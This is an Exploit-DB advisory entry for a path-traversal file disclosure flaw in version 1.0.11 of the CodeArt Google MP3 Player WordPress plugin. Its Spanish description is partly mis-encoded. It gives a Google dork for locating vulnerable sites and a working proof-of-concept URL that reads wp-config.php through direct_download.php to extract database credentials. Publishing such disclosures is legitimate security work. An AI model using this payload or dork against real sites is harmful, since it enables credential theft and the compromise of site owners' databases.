WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download

Author: QK14 Team
type: webapps
platform: php
port: 80.0
date_added: 2014-12-03 
date_updated: 2014-12-27 
verified: 1 
codes: OSVDB-121492 
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comgoogle-mp3-audio-player.zip

# Exploit Title: Wordpress CodeArt Google MP3 Player plugin - File
Disclosure Download

# Google Dork:
inurl:/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=

# Date: 02/12/2014

# Exploit Author: QK14 Team

# Vendor Homepage: https://wordpress.org/plugins/google-mp3-audio-player/

# Software Link: https://wordpress.org/plugins/google-mp3-audio-player/

# Version: 1.0.11

# http://wordpressa.quantika14.com/repository/index.php?id=14



Descripci�n:



Este plugin es vulnerable a File Disclosure Download.

Gracias a esta vulnerabilidad, un usuario podr� descargar el archivo de
configuraci�n config.php y extraer de �l los datos de acceso a la Base de
Datos.



POF:

localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_downlo
ad.php?file=../../../wp-config.php